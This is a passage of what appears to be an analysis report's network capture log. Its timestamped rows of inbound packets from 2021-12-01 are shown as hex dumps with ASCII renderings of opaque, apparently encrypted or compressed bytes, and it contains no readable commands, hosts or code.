24 3a 9d e1 4b 79 ee 07 75 08 78 64 d9 42 6a 05 41 ff b0 bb 05 4a c8 2b d2 16 e1 ae e5 eb 26 3d a4 6f da 83 99 ac f4 e2 b5 9c 3e ef ba cf 60 62 3c 67 c0 17 2a c4 ea 8c 70 25 Data Ascii: ]z3Vkr}vw-(&T=0QhOcCM$@N%&Rs>V }}+,-EkBmJ+~^QWvH^7h1{9NWpapIjHnhWK!/pk#@UmI$:KyuxdBjAJ+&=o>`b<g*p%
2021-12-01 12:26:35 UTC	111	IN	Data Raw: ee 3f ac d1 1e 97 a7 12 af ce 8a 73 7f 42 21 37 7e 47 81 d2 68 07 ea fd ff d3 48 ed b7 36 f0 60 03 2e b4 c3 a6 12 b1 f1 7a 49 a9 5d af 5d 91 8f ab 3a a4 2b 30 36 34 f9 c5 2f c8 01 59 9f 43 73 ef b0 05 50 2a 43 0c cb e2 d7 63 f0 49 2b 3b f1 23 af 5a 24 d5 06 95 cb 2b d8 14 f0 56 d3 4c 26 c1 18 e6 f4 80 e5 e3 8c 1b 99 3e 4c 6c 5d a4 38 d4 12 1c 0a 65 90 f6 39 28 bb 0d 43 98 4b cc e4 50 8e e3 a6 21 e9 42 13 63 f4 90 dd 22 07 cf a0 e7 41 0f 9e 7c d1 2b 08 2a e6 72 b7 57 cf b3 31 41 f7 bd df 94 8d 94 64 fb fa f5 2e bf fe 60 00 41 2e eb ce 44 c9 0b 1d 41 49 d5 21 3d 28 dc d0 1c 1d ce a3 cd c7 25 cc d1 db 5b a5 13 2d 16 d3 87 08 f2 9d 6a 48 53 ac 0e 9f eb b5 e7 c4 3e 27 e2 8f 1b 98 77 44 f0 f3 6b 93 9d e6 57 7c 63 c2 d1 c2 16 65 ee 87 94 8e ca da 20 a5 1b 17 ba Data Ascii: ?sB!7~GhH6`.zI]]:+064/YCsPCcI+;#Z$+VL&>Ll]8e9(CKP!Bc"A\|+rW1Ad.`A.DAI!=(%[-jHS>'wDkW\|ce
2021-12-01 12:26:35 UTC	112	IN	Data Raw: 43 d9 44 6b dd 6a 79 4b 93 14 8e 7c 0c 7e eb 39 88 f4 0e ff 3d 29 57 76 42 e3 ac 58 73 fd 6a 8c b9 2f 99 61 1f 61 cd b9 ee c1 f4 66 53 13 8b b0 bf 8c 58 70 6e 79 86 05 5b 1f 48 64 bd e0 92 0d 0e bf 2e 4e ea 88 3f 1c dc 84 00 d3 a5 af ad 60 ff d0 d7 23 60 b7 31 13 cd bb 97 71 9d d3 90 ce bd 7d 37 cb 84 2b 99 ed 7c 72 f7 7c 95 1e f5 4d f1 56 6a 16 5b c6 f7 af 12 d0 f1 15 c7 3e 40 c1 9d e1 00 26 9c 4c 48 af 8c ae fc e3 3c bc 17 be bb c5 b0 61 3b 65 a0 08 3f c4 ee e9 93 13 b3 ad a4 f6 2e 86 f3 b4 07 1b b7 52 f0 3b 4b 9d c1 7a 55 2b 15 81 7c e1 8d 93 9c f0 bd 68 bc 31 22 3d 1a ba ea ef 99 a0 dd 6f 34 0a 19 d4 04 c6 14 95 fb 81 63 49 41 90 5b 14 b4 8d 65 36 57 9b 91 b2 28 96 fd df 24 ad da 7c bf 86 32 41 3e 10 5f 59 53 71 55 10 bc 85 75 81 54 4a 7c d9 f4 9b 82 Data Ascii: CDkjyK\|~9=)WvBXsj/aafSXpny[Hd.N?`#`1q}7+\|r\|MVj[>@&LH<a;e?.R;KzU+\|h1"=o4cIA[e6W($\|2A>_YSqUuTJ\|
2021-12-01 12:26:35 UTC	113	IN	Data Raw: 59 35 fd 80 fe c0 26 59 67 35 4c 58 45 b7 c6 da 78 e0 0d 0a 56 f3 56 de d5 18 45 f7 91 c5 f5 5e f6 f8 cb f0 e1 45 31 e9 0d 91 db 5a 42 c2 bf ae 3d 7c 9e 6d d0 3f 2b d2 88 38 a6 54 cc 86 78 97 ed bd dd 90 99 84 62 9e b2 c6 3d be 22 76 01 80 11 30 e7 5f c5 1a 10 48 23 04 2a 38 2e c5 f1 27 2e ce b2 cc 06 3c 34 fa f6 41 8e 20 30 0c d8 8c 65 66 96 79 79 ad ad 22 94 e8 bc f0 87 3a 34 f3 8a 29 8b 7d 5f d1 f0 74 17 63 e7 7b 9a 5b ac 3e 15 e2 7f d1 92 8b a6 19 d3 3f ec cd 07 96 d2 11 12 7c f7 fe 3e 62 b8 b7 4d 3d ec 11 80 d3 10 d1 f4 7f 4d 46 14 77 5c e2 69 5d 90 70 32 c7 91 ae 9e c9 81 92 6e 24 03 ec 10 ed a4 61 32 db 6f 67 54 53 99 34 36 1d bd 4b f4 0b 93 48 c5 5a 41 72 0d 30 3b 6b e6 6d 25 f3 c6 be d9 0f c0 f7 b3 b9 f5 5a b5 b1 41 d2 f0 e4 93 b9 9f e3 cb 4e 3e Data Ascii: Y5&Yg5LXExVVE^E1ZB=\|m?+8Txb="v0_H#*8.'.<4A 0efyy":4)}_tc{[>?\|>bM=MFw\i]p2n$a2ogTS46KHZAr0;km%ZAN>
2021-12-01 12:26:35 UTC	114	IN	Data Raw: 76 33 f2 c2 e8 2c a7 d1 0f 9c b8 2d 51 a8 c1 78 69 51 36 e1 ee 4f b5 ce 28 b8 e1 fd ee 36 57 fa 58 1f db 73 04 47 3b 79 a4 14 b9 f5 1d d1 14 5f a9 38 4e f3 38 30 bb 39 28 34 5b 8b ce 30 d8 ec 5e 98 17 73 e3 c7 21 7f d5 b6 87 96 f9 c4 69 e3 5c 27 5a 46 dd ae 7c 5a cf 0e 8d 17 0f e2 14 f0 56 c8 48 26 cd 68 03 e5 8b ef da 32 04 95 ca 61 52 45 98 e6 27 e8 e3 13 07 43 ff 39 33 df 07 63 66 40 eb e0 5d f9 f4 a7 28 f4 93 aa 50 f4 1e 6c 62 12 cf a0 ed 31 56 8d 77 db 31 12 33 94 ea b6 7b d5 8f a8 9c f2 bb 0f 29 e5 7e 63 94 ab ea 30 a6 29 67 1b 94 24 ec 18 72 e5 0d 3c c9 53 de 38 33 28 cb d1 2b 35 30 a2 eb 08 22 a5 07 db 47 a3 02 2a 79 19 85 65 7d 82 77 5b 58 ac 1f 94 f2 4b e6 7d a7 31 f4 1b ac 8f ac 4c c9 f6 71 3a 96 e6 46 98 7b 3c c1 c6 14 13 ee 83 80 a0 03 c1 33 Data Ascii: v3,-QxiQ6O(6WXsG;y_8N809(4[0^s!i\'ZF\|ZVH&h2aRE'C93cf@](Plb1Vw13{)~c0)g$r<S83(+50"G*ye}w[XK}1Lq:F{<3
2021-12-01 12:26:35 UTC	115	IN	Data Raw: fe cb 47 d7 2c 2d 45 6b db 42 4d 0a c8 36 37 2b 0e 74 5a 6c e5 f7 0e fd 50 53 2c 35 49 ee aa 49 c6 20 be 01 98 30 95 7a 75 4b 38 b8 ea ed e2 4e 41 01 bb bf b3 09 71 61 6b 8e 80 6a 53 08 5b 6b bc 3b 92 0d 0e 97 2d 4e f3 70 33 39 f1 81 08 c9 b0 c5 b4 70 fa c7 05 2e 45 88 27 6d 88 bc bf 51 9f a8 dc c2 bf 7f 50 17 85 03 a6 f3 44 62 ff 00 64 1f e4 4e c1 bc 6a 3a 5f ed b7 77 05 00 54 10 c5 3e 47 a2 fc f2 05 2c a5 7c 51 51 87 91 f1 f2 39 8a 0f ee ba c5 ac 63 39 67 ca 3a 21 cd 14 87 74 17 bb 8d 61 e4 e5 94 29 b2 d4 88 5c 53 dc 28 5a 96 ac 2d 53 29 6a b5 ab 9c cf fd 57 f6 a2 6b 75 2c fa 3b c5 b6 f1 02 92 b2 72 7e 3d 1b 11 ad 47 a8 de 93 f9 f0 2d 59 49 4c 4b d4 a3 af 48 ef 81 89 84 df a0 d0 fc d9 08 af f3 76 b5 ae 4e 3e 78 17 77 73 58 77 85 72 fc 3c 75 8b f6 58 7f Data Ascii: G,-EkBM67+tZlPS,5II 0zuK8NAqakjS[k;-Np39p.E'mQPDbdNj:_wT>G,\|QQ9c9g:!ta)\S(Z-S)jWku,;r~=G-YILKHvN>xwsXwr<uX
2021-12-01 12:26:35 UTC	116	IN	Data Raw: f7 43 37 c2 60 f0 e5 85 f0 c5 2a 16 99 25 6d 61 56 5e 11 f1 11 08 26 15 4b e7 34 22 c5 15 5a 66 40 eb eb 56 9a 6b a5 21 e7 53 32 f2 76 90 db 5d 82 cd db a4 2f 77 9a f2 6c 08 2c 2d 89 1e ad 44 c8 9e bf 92 e4 a6 27 b9 a6 94 74 96 d6 b6 2f b5 26 70 d0 8c 31 dd e3 6c c2 18 1a 52 5d f0 34 29 d6 db f6 39 34 c6 b5 57 20 d0 34 04 25 58 b7 00 22 16 da 8a 79 89 9c 4a 42 5b d8 1c 9f eb ae ed 4c b8 2a f7 84 16 87 61 a1 c1 d7 61 38 99 f1 81 80 67 dd d8 f9 10 60 ff 8c 9f aa f6 d9 0c 98 35 17 bf dc 09 00 3b 76 ca 7a 71 b2 bf 4b bb f4 1c 7e d3 2f dd 96 78 59 57 17 e8 66 fd 67 4f 39 61 24 d8 a6 44 60 c8 a7 98 84 4a ff e7 38 36 a1 0e c4 46 70 6c 28 8e 9b 25 31 15 6c da 24 25 9a 7a b3 35 be 73 12 3a 37 24 f5 77 28 f9 33 a0 e4 a2 c3 a0 e8 bb fc 49 77 08 4c 0b e7 34 09 1f 98 Data Ascii: C7`%maV^&K4"Zf@Vk!S2v]/wl,-D't/&p1lR]4)94W 4%X"yJB[Laa8g`5;vzqK~/xYWfgO9a$D`J86Fpl(%1l$%z5s:7$w(3IwL4
2021-12-01 12:26:35 UTC	118	IN	Data Raw: d2 9a c7 95 65 4b 31 83 2b 34 f2 44 68 1a 13 61 0e e3 58 dc 69 28 16 40 eb b8 53 13 fa d7 39 aa f7 46 ae ef f9 5d 3a 9a 4b 53 bc 83 bd ea f1 38 4a 2e c3 b9 dd a3 75 3c 76 de 26 c0 c5 c6 83 4c 3b a9 b4 7b ee e7 94 3f 5d d0 ba a1 45 e3 3f 58 85 d2 71 ac 28 42 b4 56 e3 a2 47 55 9d 74 62 66 23 96 09 c0 a9 fb fc 93 8b e5 3e 66 38 13 d6 02 a9 de 97 0b b4 32 70 d8 48 43 c8 12 90 ab 63 aa 83 86 dc d7 81 fa 57 bb ae 01 6f b1 a3 4e 61 3c 1f 6f af 49 1e bc 7f c4 8f 79 8c ff 53 56 cd 20 88 88 b8 c1 5d 25 11 8a d2 d5 89 50 27 c0 e5 db 94 1d a0 04 87 3b ad f5 0b df 68 0c 25 4e df ce a2 52 07 88 a5 ec 42 ff f3 73 79 2c b0 a8 d6 fd e9 e2 f3 66 66 d9 f3 d1 9e 05 18 28 12 09 84 fd 67 4c b7 c5 f6 81 5a fb 08 9c c8 e6 f2 b2 04 77 46 56 e0 25 af 92 b9 19 a2 f8 20 fb 4b 62 1c Data Ascii: eK1+4DhaXi(@S9F]:KS8J.u<v&L;{?]E?Xq(BVGUtbf#>f82pHCcWoNa<oIySV ]%P';h%NRBsy,ff(gLZwFV% Kb
2021-12-01 12:26:35 UTC	119	IN	Data Raw: cb d3 22 0d ea a6 c7 1f 4a 40 fa da 41 ca 8b 2f 16 c1 8c 74 73 95 09 bf 52 ac 08 92 fa b2 f3 79 44 23 f7 93 0c 15 71 5f c0 fa 78 37 8c f8 41 bb 46 c7 c0 ec bf 71 f0 95 94 b2 20 7b 20 af 39 17 bd ce 30 ea ae fa e7 6d fc b4 b7 5c 37 e0 03 6f cd 2a f2 a1 7a 4f 40 b0 75 46 e9 73 5a b3 d3 23 cc 84 c7 5d ca ad ba 41 fe ff ed 1a d2 6e 0f ce da 66 75 13 40 98 34 3a 1d ea 23 25 09 92 51 ed 24 9e 65 1b ba 1b 29 f5 67 87 f3 ed b5 dc e5 e9 78 a0 ba f6 59 4b e3 55 08 e1 25 93 95 9f e3 cb 51 00 2c 3b 23 66 2f 1e db 7e bb 43 15 2a 52 41 a3 b1 3b 29 83 c2 8a 22 d6 7b 17 f8 2e 4a 28 94 8d 14 b0 cc 76 44 1c 01 11 17 af 87 a1 95 54 44 c7 15 c0 14 55 67 a2 13 4f 9c 2c b9 67 87 04 14 14 85 ad 42 a4 d8 75 db 1c ee c1 d5 24 6d e5 ec 01 9b 31 f7 32 b3 f1 9e cd cb 12 b3 71 86 dd Data Ascii: "J@A/tsRyD#q_x7AFq { 90m\7ozO@uFsZ#]Anfu@4:#%Q$e)gxYKU%Q,;#f/~CRA;)"{.J(vDTDUgO,gBu$m12q
2021-12-01 12:26:35 UTC	120	IN	Data Raw: b6 2b c0 ad 85 b0 92 8b e1 74 e0 ed 11 d6 02 8c f6 a0 fb 8b 61 4b 5b 5c 49 ea 9d 87 7d e4 5c 61 84 dd dc 95 d5 fe 09 b9 dd 54 91 ae 65 49 16 27 77 77 5b 48 9a 7d c4 85 63 06 dd 5b 76 cf 31 93 8a b8 04 5a 25 1d 8a 15 d7 89 50 c8 3a f3 0d 9f 07 a5 11 a2 8d 5b de 0b ca 37 e9 27 f1 d5 dd 87 96 09 89 b4 fa 43 df e3 3f 7b 2c ba 24 ed f8 f0 07 e1 56 71 c7 f4 fd ac 12 1d 2e 15 81 9b 03 66 61 aa a2 5b a9 f9 f1 03 8f f3 cb f7 a3 07 76 90 bf ce 26 bd 90 a0 0d 9b d5 3e 05 4c 58 94 47 b3 95 82 f0 2d be 16 fa 25 50 72 bd 37 b9 d1 30 3d 5f db f6 dd e8 17 45 d3 1e 9d b6 0e bb 81 c5 77 6a 5e 37 ba 78 5c b1 d0 7c bf fe d5 5c 3d 48 e7 8e 34 f2 65 05 3e ef 90 a6 12 b1 d5 9b 24 15 55 87 e2 9c f1 32 16 b9 30 27 2b 73 1d c6 2f c4 04 d2 b3 1b 62 e8 cb 75 44 02 ea 78 89 e8 ff fe Data Ascii: +taK[\I}\aTeI'ww[H}c[v1Z%P:[7'C?{,$Vq.fa[v&>LXG-%Pr70=_Ewj^7x\\|\=H4e>$U20'+s/buDx
2021-12-01 12:26:35 UTC	122	IN	Data Raw: 90 fc 77 c8 bc a7 76 6b 01 ec 3c ff b2 00 b0 96 6e 61 3f 92 94 1c 20 08 67 22 36 02 8c 63 de 22 be 62 1a 29 3d d7 f4 4a 31 f3 cb b0 cc d9 a7 da a0 b0 93 ba 62 20 50 1b f5 2d 04 81 88 e3 db 55 3e 2d e4 34 5c a8 52 2d 7f ba e7 17 0d 59 44 a4 8e 98 38 94 d6 60 0b 39 71 2f 80 38 c7 2f 8b 84 06 b4 ee 76 71 15 1b 63 29 83 90 b1 32 6d 4d d6 01 d2 14 d2 67 a2 13 73 21 ef ba 6d 92 1b 86 1d 96 ba 43 a6 ec 7b ea f4 f9 61 e3 1c a0 e5 4e 10 a7 36 f0 31 9b 43 89 d2 e3 f8 9a 99 89 cc 63 a7 53 84 09 98 99 49 ef 33 40 7c 1a d6 71 ed c7 ac f4 bf b8 f4 2c 27 56 6f c0 51 7a 4a 82 09 b9 22 f0 7f c1 1a b7 e3 1f ed c8 42 52 69 42 fd b9 5e 0d 20 77 ad 4d 31 b9 70 7b 2c 3b b8 e8 d4 f2 51 63 01 9c ba a2 9c 6f 74 95 78 ac 4a 53 17 59 64 9c 81 fc e1 0c 97 36 24 6d 8f 32 1f ec f8 8d Data Ascii: wvk<na? g"6c"b)=J1b P-U>-4\R-YD8`9q/8/vqc)2mMgs!mC{aN61CcSI3@\|q,'VoQzJ"BRiB^ wM1p{,;QcotxJSYd6$m2
2021-12-01 12:26:35 UTC	123	IN	Data Raw: 0a e7 48 fb 51 fc dd b7 a8 2e b0 a2 a8 04 f1 1c f4 52 0f 0a e2 d5 8e 79 e3 29 03 0a 8f 0d 77 6e c0 fa 4e 81 5e e0 0c ad c7 e1 f2 a5 12 6b cb 75 ce 26 b1 92 ac 08 a3 f5 55 2d 48 4e 1f 51 a3 84 8f cc 14 af 3e 5f 0d 7e 7a 95 18 94 3a 34 2b 7d 5c d0 df e2 39 bd c1 0f 9c 8f 3f aa a9 eb 5b 44 5a 21 31 57 b7 b3 d1 62 c4 cc ff ff 3b 59 fd a5 71 dd 67 03 2e c1 69 b4 7d ac fc 72 2c cb 50 8a 7f ab f1 38 30 b7 35 13 07 5b 9a cf f1 c2 03 55 a3 cd 71 e3 ce 6b 41 3d 77 0d 77 1d 28 73 f6 5a fa 56 77 32 ba 41 5d 42 b0 aa 2a fa 0b fa f2 54 db 08 12 c7 77 26 f6 80 ef 98 39 1b 99 3f 60 7e 4c fe 10 dd 17 0e 0c 0a 50 ee 39 22 d5 18 43 98 41 5a f5 54 e1 4f a5 21 e3 4f 39 86 f7 9f db 5c 94 d5 a0 ed 2f 6c ae 75 db 7a 18 2c 89 11 b6 57 d4 9c a4 9d ed c3 38 b9 8a 8f 7d cb 9e fd 2c Data Ascii: HQ.Ry)wnN^ku&U-HNQ>_~z:4+}\9?[DZ!1Wb;Yqg.i}r,P805[UqkA=ww(sZVw2A]B*Tw&9?`~LP9"CAZTO!O9\/luz,W8},
2021-12-01 12:26:35 UTC	124	IN	Data Raw: a3 f4 67 66 0b 4c 9f d6 ba cb a0 37 47 64 d0 7c af 3d f6 63 a0 1d 26 c8 ee ba 63 ab 13 8a 23 81 ad a9 b7 fb 64 f0 0b f8 5c e8 da 78 a9 4e 10 ba 27 9d 13 9b 52 9a b0 bf 07 9b b1 87 0d 3e af 3c ae 23 8c 9f 56 c6 08 57 7d 0b cb 16 6e c7 80 fa c2 3f 0a 2d 3b bb 6a d1 44 41 67 91 1d 28 9c 73 fe ec 11 a2 f4 0c 82 d2 50 57 72 60 b6 ac 5e 16 4a 17 8d b3 34 96 6d 0a 75 46 b9 ee c3 e0 35 c1 13 8b be 9b 66 72 61 61 7d 94 94 43 08 b6 6f 8f 50 bf 20 0c 93 b2 fc 97 0c 33 15 f0 95 07 a8 21 c1 b4 65 d7 82 f9 2f 63 e2 a4 17 cd b9 bb 43 9f a8 1b c2 bf 7f 5a 7a 04 2a 93 f6 6c 85 e3 13 6b 1a e1 b5 d8 54 95 17 5d e6 8c ea 10 d3 57 8c b8 ba 47 ae e1 e3 02 57 30 78 4a ab ae e5 f9 f4 25 c9 ac ee ba c1 b5 66 3e 1c 58 3e 3e c0 e8 fd dc 10 b3 a3 56 03 f4 91 23 a1 d4 18 15 2f 76 3b Data Ascii: gfL7Gd\|=c&c#d\xN'R><#VW}n?-;jDAg(sPWr`^J4muF5fraa}CoP 3!e/cCZz*lkT]WGW0xJ%f>X>>V#/v;
2021-12-01 12:26:35 UTC	125	IN	Data Raw: 0c 35 7f 5a 9b 87 16 32 eb fd fb 26 d2 c8 8b 14 d1 7e 1c 04 dd 50 89 10 bb fb 58 7c 6b c6 ae 57 98 ed a2 1f 89 2a 1d 23 44 aa da 23 ea 3f 5d b4 1d 48 b3 a1 f8 51 2a 4d 65 13 c7 fa 69 c5 50 33 79 7d 2c 87 7d 49 cc 01 bf 9b 79 6d 04 f4 7a c5 d3 03 ea 7c 00 e8 9f a4 d4 34 33 b4 36 60 78 66 c2 6e 44 16 1c 08 15 59 6e 1c 0f d8 3e 5c 91 5e 9f ea 58 c9 0f a6 21 e5 6f 59 f8 6e 91 db 58 8b c5 3a c8 03 7b b8 63 d1 3f 7d 33 82 3c 9a 55 c5 98 84 c1 85 35 d8 b8 8e 9a 69 0e 88 d8 25 93 3d 6c 15 f0 22 e6 cb 71 c9 0d 3d 30 32 64 2a 38 2c c5 d6 ae 00 e3 af e1 06 29 d5 89 c5 5b 8d 3e 2d 16 cd ad 0b 09 04 67 48 57 b3 03 05 ce 98 e8 77 b4 2a d7 1b 1b 98 76 40 ca d3 46 2b 9d e0 7d fd 1d 5b c1 ea 19 7f e0 1b a5 8b 07 fe 3f a1 13 9e ba da 18 1a a0 d2 cc 78 71 b5 9d 32 48 6a 1d Data Ascii: 5Z2&~PX\|kW#D#?]HQMeiP3y},}Iymz\|436`xfnDYn>\^X!oYnX:{c?}3<U5i%=l"q=02d8,)[>-gHWwv@F+}[?xq2Hj
2021-12-01 12:26:35 UTC	127	IN	Data Raw: e3 37 b9 c3 2e 7d 50 51 57 68 60 c3 ac 5e 1a 1d 02 f2 2a 31 95 7f 17 38 a3 9d c3 c9 c4 51 77 32 07 b8 b3 8b 68 49 46 7b 80 6c 68 74 36 f7 85 57 97 12 39 0d 19 66 e4 a8 2d 22 d4 19 07 d3 a3 d9 9c 4c fd da fd 05 03 e1 bc 17 cd b9 a0 6d 07 f6 b7 cd 99 64 60 21 17 29 93 f2 5f 40 cc 11 61 19 df 21 a7 db 6a 16 55 f1 99 37 37 fb d7 1d da 07 66 38 e7 e1 00 30 9c 54 48 af 80 97 91 8a b6 b5 2f eb a5 ff 2a 55 11 69 fd 20 04 e4 76 84 58 11 ae 8f 53 ec f6 97 03 c9 af 0f a3 52 f4 25 63 0e f2 46 5c 0f 71 8d 5d 42 8b fc 57 eb 95 4f 64 29 fc 00 ae d7 62 fd 93 8f fa 42 a7 3e 3e d9 24 b6 e2 b7 5d 89 6b 58 56 41 6b ef a7 87 7b c4 eb fd 1f dc dc 93 e2 e4 96 9c f6 72 93 b1 58 63 91 14 77 77 46 59 7e 7d c4 83 5f e1 88 c2 77 ce 26 97 b6 0a 06 72 2b 3d bd 0f f7 39 58 bb c9 e5 25 Data Ascii: 7.}PQWh`^18Qw2hIF{lht6W9f-"Lmd`!)_@a!jU77f80TH/Ui vXSR%cF\q]BWOd)bB>>$]kXVAk{rXcwwFY~}_w&r+=9X%
2021-12-01 12:26:35 UTC	128	IN	Data Raw: 30 f5 3a 1e 0c 0c 7a 9e 47 bb d5 18 47 87 24 5d d0 79 ef 04 bb 44 c3 d1 3f 86 f7 8c f3 71 96 cf a6 c7 40 09 07 7d db 24 06 4a 13 31 9a 58 e3 81 c8 bf 61 a8 d9 b8 95 95 4a b9 af f5 28 9f 48 19 93 9e 3b ca f9 14 53 2e 3a 5c 6a e2 4c 18 82 de da 34 3e e6 8e c5 19 23 e0 95 a4 de a4 13 2b 09 a3 1d 40 5a 92 40 57 3b 8c a1 9b eb b5 f8 5e 83 0a f5 95 1d b2 1c 21 59 fa 6b 2d 82 8f cd b6 4e cc e6 f5 74 40 50 85 80 a6 13 f0 0d ad 33 00 90 b4 66 9c ab fa e5 65 1b 29 92 71 39 d5 03 14 f2 ff de 87 7f 50 63 3a 49 5b fd 61 64 f5 0e ba cd 8e eb 7f a3 37 95 44 44 d9 f2 7b cb 4b 0a ce da 70 6a 13 ae 99 34 3a 20 09 5a bc 08 93 46 d2 59 24 56 20 39 02 36 99 46 d6 e6 cd a1 d7 e4 e9 f6 a2 ba fa 67 09 5e cf 09 e7 36 01 ff 05 c6 e7 4c 07 22 77 15 78 a6 21 db 62 92 cc 06 0b 40 7f Data Ascii: 0:zGG$]yD?q@}$J1XaJ(H;S.:\jL4>#+@Z@W;^!Yk-Nt@P3fe)q9Pc:I[ad7DD{Kpj4: ZFY$V 96Fg^6L"wx!b@
2021-12-01 12:26:35 UTC	129	IN	Data Raw: d1 fc 6f 7a 30 71 7e a0 ad 12 f6 ac 3c c5 3e 5c 86 c8 e3 00 2a 9e fb 34 36 87 bd ff d4 be b4 2f ef 20 e0 9d 61 1a 47 4a 3f 3e c4 ca ff 5f 11 b3 bd 56 c3 f4 91 2f 89 53 e8 3b 53 f0 3e 78 06 d7 6b 52 b3 4b 9b 6c c7 a9 6e 57 f2 bd 42 1b 2e fa 2a d8 81 d6 fe 93 8d cf fc 43 82 12 d6 06 89 4d 97 fb 8b f1 7d 64 59 65 e2 36 87 7d ee a1 fc 81 dd dc 8a d5 f4 0e b9 dd 56 37 d0 fc 42 3e 12 57 e3 51 71 53 e5 e1 a8 64 ad d6 cf 76 ce 22 a8 0e 97 23 5f 3b 33 8f 33 d7 8f 70 39 b7 6b 0c 99 10 91 95 b6 e2 aa 45 2e e1 49 29 05 64 df ce a2 8e 89 8f b4 fa 46 d2 e6 da 79 2a 9a 2a b9 61 f1 1c f6 6a f6 db e0 d5 1e 33 30 39 25 2c 0a 03 66 60 9e 39 48 81 5a e6 2b a8 d9 e3 f4 89 83 1e 21 56 cc 22 97 16 bc 19 b3 67 1f 28 5b 68 39 d7 b3 95 83 c4 a9 ad 3e 59 3f 78 55 97 1e ba fb b4 55 Data Ascii: oz0q~<>\46/ aGJ?>_V/S;S>xkRKlnWB.CM}dYe6}V7B>WQqSdv"#_;33p9kE.I)dFy**aj309%,f`9HZ+!V"g([h9>Y?xUU
2021-12-01 12:26:35 UTC	130	IN	Data Raw: 3c 0e 23 6c cb 31 00 f6 0e f9 72 78 5f 76 48 f1 b8 76 31 35 68 8a 99 b6 eb e2 09 0e 3d 98 49 c7 e2 4e db 37 a6 a8 95 ab d7 61 6b 79 a0 55 4a 1e 48 71 8d 7f be 0f 0e 91 16 cd 94 17 33 15 f0 b7 ad d3 a3 c0 2e 44 d2 c8 dd 0f c1 9f 25 16 ed f5 b7 55 9d cc 8a eb 92 79 58 07 ac a9 ed 6b 45 68 e5 33 c8 1f f5 4b 43 67 46 07 77 ce 09 ad 12 d6 f9 63 cd 3e 46 b5 cd cc 02 2c b2 53 c8 d1 1f bc fb f0 0f 1e 2f ef ba 5f 95 5d 2d 41 fb 95 3e c4 ea a6 05 19 b3 a7 64 c6 db 93 29 a5 fb 14 dc cb f1 3a 5c b4 7c 6b 52 29 f4 93 50 f0 af dc fc f2 bd 62 46 48 f2 2a c0 b7 d3 d1 91 8b e3 54 bf 65 8a d7 02 ad fe 3b fb 8b 6b c2 6c 65 52 e4 85 2b 7d ee 81 a3 ef d5 dc 97 e4 f1 21 bb db 7a 9f 28 1b da 3f 16 73 57 fc 71 53 7f 5e a0 58 99 d0 7b db ce 22 88 a8 fc 2b 5f 25 04 ad 19 fa 8b 5a Data Ascii: <#l1rx_vHv15h=IN7akyUJHq3.D%UyXkEh3KCgFwc>F,S/_]-A>d):\\|kR)PbFH*Te;kleR+}!z(?sWqS^X{"+_%Z
2021-12-01 12:26:35 UTC	131	IN	Data Raw: ad 7e 4c a0 8a f8 3a 0e 2a 2a 9d f4 39 22 f4 82 49 98 41 d8 d6 7c cc 20 a4 27 c9 c3 45 1f f6 90 df 7c 5a cf a0 ed b4 52 b3 6e fd 00 d7 2c 89 14 97 ea cf 9e ae 80 d9 84 f4 ba 8a 83 48 12 d3 6c 2f b5 26 47 c5 9f 3b ce 7c 56 e4 19 31 72 83 fd 2b 38 08 05 d0 34 25 d1 81 ef 34 27 ca fd f0 c1 db 8a 2e 16 cf a7 b5 77 9d 66 d2 76 81 1c b9 cb 65 e7 51 ab 07 f6 9e 1b 98 69 7c e8 d6 69 29 9b cc d1 ed fa c3 c0 ee 3d b1 ee 81 80 3c 2d f5 32 89 13 d7 ba da 18 25 8e f1 e1 7a 6e 96 9f 71 34 f3 1a 54 54 42 43 86 7f 4b 66 c0 64 59 fd fd 6b b6 62 05 ec 5c ef 60 c8 8d f9 62 4b ff f2 36 c3 8e 0c ce dc 45 e7 45 1a 9a 34 38 2a b4 24 25 09 09 67 e0 27 98 53 de 36 24 29 d5 09 2e e2 cd be ef d9 ec d9 a0 bc d6 cb 1d b9 57 08 e3 12 ca 92 9f e3 50 67 0c 2f 3c 15 a4 a3 21 db 5e 2c ea Data Ascii: ~L:*9"IA\| 'E\|ZRn,Hl/&G;\|V1r+84%4'.wfveQi\|i)=<-2%znq4TTBCKfdYkb\`bK6EE48$%g'S6$).WPg/<!^,
2021-12-01 12:26:35 UTC	132	IN	Data Raw: 13 67 35 77 35 40 43 6b 12 71 1a a0 ad 12 4c fc 16 d4 18 66 5a e5 e1 00 0c b7 77 4a af 9b 95 d6 f6 2f b2 05 6d c4 5c b1 70 38 47 2e 3f 3e c4 70 a3 75 00 95 87 8b ee f6 91 09 a9 df 96 a2 48 d8 17 5a 94 d1 41 d0 57 f7 b7 7d e5 a9 0a 57 f2 bd f8 43 04 eb 0c e0 5f fb fc 93 ab eb 70 3d 1b 09 fe 2f ab de 91 d1 09 15 c1 48 48 47 e2 52 87 7d ee 1b a6 ab cc fa b7 0a d9 0c b9 fb 6e bb ae 65 59 16 3b 75 77 57 5b d1 01 5d 84 75 8f d6 a3 76 ce 22 12 ad bd 32 79 05 e3 a2 31 d7 a9 4c b5 c9 f2 14 b1 39 b3 00 b0 c8 28 a1 92 cd 58 0b 05 08 df ce a2 34 22 a5 a5 dc 71 03 cb d8 79 0c a9 a6 c7 f8 ed 34 df 48 60 dd ca 57 fa 8f 1c 28 07 2c 66 03 66 60 24 93 62 90 7c d1 f9 85 db e3 d2 83 0f 60 b8 4a e4 0b b5 81 ba 33 35 83 a3 04 4a 4a 39 bb b3 95 83 7e 1c 87 2c 7f 05 ab 78 95 1e Data Ascii: g5w5@CkqLfZwJ/m\p8G.?>puHZAW}WC_p=/HHGR}neY;uwW[]uv"2y1L9(X4"qy4H`W(,ff`$b\|`J35JJ9~,x
2021-12-01 12:26:35 UTC	134	IN	Data Raw: 3e 2d 16 cd ad e7 09 04 67 48 57 8c 15 9e eb b5 7d 74 86 36 d1 b5 00 99 76 5f e0 ec 7b 29 9d f8 7f be 61 c2 c6 c0 9b 1e 77 80 80 a2 28 c4 21 af 33 9c 9f f7 0a 23 8a e6 e0 7a 71 93 a8 4c 36 f3 03 5f fa 11 d8 87 79 65 c0 6c fd 58 fd 63 6e 86 71 23 cc 14 ca 4d da 8b 90 74 4a ff ed 30 ab b3 0e ce c5 66 49 16 81 9b 32 16 8c 19 bd 24 09 97 62 d3 34 be 73 97 13 09 3b d3 46 3b e3 cd a1 e8 b8 d1 db a0 a5 ef 65 4e 22 56 0e cd b0 60 0b 9e e3 ce 62 3e 3c 1a 35 ea 86 0c ca 58 9a fe 05 0b 46 75 eb 89 98 29 98 e0 b3 08 15 7e 3d 78 47 5e 2e 94 89 35 83 ef 67 66 90 33 b0 3a 89 a7 80 36 45 66 f3 60 c4 